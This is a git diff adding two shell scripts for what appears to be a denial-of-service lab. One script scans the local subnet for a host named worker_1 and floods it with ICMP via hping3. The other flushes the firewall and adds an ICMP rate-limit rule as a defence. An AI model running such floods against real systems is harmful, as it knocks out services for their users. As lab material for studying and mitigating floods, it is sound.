diff --git a/1. DDos Attack/master.sh b/1. DDos Attack/master.sh new file mode 100644 index 0000000..a3abd8e --- /dev/null +++ b/1. DDos Attack/master.sh @@ -0,0 +1,4 @@ +my_ip=$(ifconfig eth0 | grep 'inet' | cut -d: -f2 | awk '{print $2}') +network=$(echo $my_ip | sed 's/.[0-9]$/.*/') +worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()') +sudo hping3 -p 80 --flood --icmp $worker diff --git a/1. DDos Attack/worker.sh b/1. DDos Attack/worker.sh new file mode 100644 index 0000000..64062a3 --- /dev/null +++ b/1. DDos Attack/worker.sh @@ -0,0 +1,8 @@ +my_ip=$(ifconfig eth0 | grep 'inet' | cut -d: -f2 | awk '{print $2}') +sudo iptables -F +sudo timeout 2s tcpdump -i eth0 icmp and src $my_ip +sudo iptables -N icmp_flood +sudo iptables -A INPUT -p icmp -j icmp_flood +sudo iptables -A icmp_flood -m limit --limit 1/s --limit-burst 3 -j RETURN +sudo iptables -A icmp_flood -j DROP +sudo timeout 5s tcpdump -i eth0 icmp and src $my_ip